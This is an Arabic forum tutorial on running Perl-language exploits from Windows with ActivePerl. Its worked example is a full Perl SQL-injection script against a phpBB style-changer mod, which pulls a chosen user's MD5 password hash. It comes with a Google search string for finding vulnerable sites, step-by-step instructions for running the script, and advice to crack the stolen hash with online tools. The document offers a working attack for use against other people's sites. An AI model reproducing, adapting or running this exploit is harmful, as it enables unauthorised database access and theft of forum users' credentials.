[grade="00008B FF6347 008000 4B0082"]
ڪْيًفيًة معّرٍفة آلِثغرٍآتِ آلِمڪْتِوَبة بآلِغة آلِبيًرٍلِ ..؟
عّندِمآ ننظرٍ آلِـﮯ آـﮯ ڪْوَدِ وَ نجدِ فـﮯ بدِآيًتِة :[/grade]
[grade="DEB887 D2691E A0522D"]
آذآ عّلِيًنآ آن نعّلِم آن آلِثغرٍة آلِتِـﮯ سّوَف نتِعّآملِ معّهآ هـﮯ آحدِـﮯ آلِثغرٍآتِ آلِمڪْتِوَبة بلِغة آلِبيًرٍلِ ..
طرٍيًقة آلآسّتِغلآلِ :
ـــــــــــــــــــــــــ ـــــــــ
آوَلآ:: آذآ ڪْنتِم من مسّتِخدِميًن بيًئة آلِلِيًوَنڪْسّ فهذآ شـﮯء ممتِآز جدِآ وَ لآ حآجة لآـﮯ برٍنآمج وَ آعّتِقدِ آيًضآ آنڪْم لِسّتِوَ فـﮯ حآجة لِقرٍأة هذـﮯ آلِدِرٍسّ .
آمآ آذآ ڪْنتِم من مسّتِخدِمـﮯ بيًئة آلِوَيًندِوَز فعّلِيًڪْم بأسّتِخدِم برٍنآمج ActivePerl
وَ ذآلِڪْ لِعّملِ ڪْوَبيًلِرٍ لآڪْوَآدِ آلِبيًرٍلِ .
وَ هذة وَصلِة لِلِبرٍنآمج ::
[/grade]
اضغط على
......الجيووووووش......
آلآن بعّدِ تِحميًلِ آلِبرٍنآمج وَ عّملِ Setup لِة عّلِـﮯ آلِجهآز سّوَف يًڪْوَن عّلِـﮯ هذآ آلِمسّآرٍ .
آلآن ڪْلِ شـﮯء تِمآم نبدِآ آلِعّملِ 
بعّدِ آن نجدِ آحدِ آلِثغرٍآتِ مثآلِ حنآخدِ ڪْمثآلِ آحدِ آلِثغرٍآتِ آلِلِـﮯ وَضعّتِهم لِڪْم فـﮯ قسّم آلِثغرٍآتِ وَ هـﮯ ::
كود PHP:
#!/usr/bin/perl
#########################################################
# _______ _______ ______ #
# |______ |______ | \ #
# ______| |______ |_____/ #
# #
#phpBB Style Changer/Demo Mod-->GET HASH EXPLOIT #
#Created By SkOd #
#SED security Team #
#http://www.sed-team.be #
#[email protected] #
#ISRAEL #
#########################################################
#google:
#"Powered by phpBB" inurl:"index.php?s" OR inurl:"index.php?style"
#########################################################
use IO::Socket;
if (@ARGV < 3){
print q{
############################################################
# phpBB Style Changer\Viewer MOD SQL injection Exploit #
# Tested on phpBB 2.0.19 #
# created By SkOd. SED Security Team #
############################################################
bbstyle.pl [HOST] [PATH] [Target id]
bbstyle.pl www.host.com /phpbb2/ 2
############################################################
};
exit;
}
$serv = $ARGV[0];
$dir = $ARGV[1];
$id = $ARGV[2];
print "[+]Make Connection\n";
$serv =~ s/(http:\/\/)//eg;
$path = $dir.'index.php?s=-99%20UNION%20SELECT%20null,user_password,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null%20FROM%20phpbb_users%20Where%20user_id='.$id.'/*';
$socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$serv", PeerPort => "80") || die "[-]Connect Failed\r\n";
print $socket "GET $path HTTP/1.1\n";
print $socket "Host: $serv\n";
print $socket "Accept: */*\n";
print $socket "Connection: close\n\n";
print "[+]Connected\n";
while ($hash = <$socket>){
$hash =~ m/open(.*?)template/ && print "[+]User id: $id\n[+]Md5 Hash: $1\n";
}
آوَلِ شـﮯء تِسّوَوَوَيًه بعّدِ معّرٍفتِنآ آن هذآ آلِڪْوَدِ لآحدِ ثغرٍآتِ آلِبيًرٍلِ هوَ آننآ نأخدِ آلِڪْوَدِ ڪْلِة Copy وَنضعّة Past فـﮯ آلِـ Notbad وَ نغلِقهآ حيًطلِب منڪْ عّملِ Save نضغط عّلِـﮯ ڪْلِمة Yes آلآن لِدِيًنآ آلِڪْوَدِ عّلِـﮯ هيًئة txt عّلِيًنآ آن نغيًرٍ آلآمتِدِآدِ من txt آلِـﮯ pl نفتِرٍض آننآ سّوَف نقوَم بتِسّميًة آلِملِف exploit.txt عّلِيًنآ آن نغيًرٍ txt لِيًصبح بهذآ آلِشڪْلِ exploit.pl آلآن وَ بعّدِ آلِتِأڪْدِ من آتِمآم هذة آلِعّملِيًة بنجآح عّلِيًنآ آن ضعّ آلِملِف exploit.pl دِآخلِ آلِملِف bin عّلِـﮯ هذآ آلِمسّآرٍ
[grade="FF4500 4B0082 0000FF 000000 F4A460"]
وَ بعّدِ وَ ضعّ آلِملِف دِآخلِ هذآ آلِمجلِدِ نذهب آلِـﮯ آلِـ Run آلِموَجوَدِة ضمن قآئمة Start وَ نڪْتِب cmd سّيًظهرٍ لِنآ شآشة آلِدِوَسّ
وَ بعّدِ ذآلِڪْ ::
وَ بعّدِ آن يًتِم عّملِ آلِتِرٍجمة لِملِف آلِبيًرٍلِ وَ يًفتِح آمآمنآ سّوَف نشآهدِ طرٍيًقة آلآسّتِخدِآم آلِخآص لِهذة آلِثغرٍة
وَ ڪْلِ ثغرٍة لِهآ طرٍيًقة آلآسّتِخدِآم آلِخآصة بهآ
نڪْتِب آلِمطلِوَب وَ نظغط آنتِرٍ وَ شوَف آلِنتِيًجة عّلِـﮯ حسّب نوَعّ آلِثغرٍة وَ عّندِ آلِحصوَلِ
عّلِـﮯ آلِبآسّوَرٍدِ بيًڪْوَن بشڪْلِ مشفرٍ مآعّلِيًڪْ آلآ آنڪْ تِفڪْة بأـﮯ برٍنآمج آوَ موَقعّ من موَآقعّ فڪْ آلِبآسّوَرٍدِ ..
وَآن شآء آلِلِه آنيً قدِرٍتِ آفيًدِڪْ ڪْذآ تِقبلِ مرٍوَرٍيً
~ ^
[/grade]
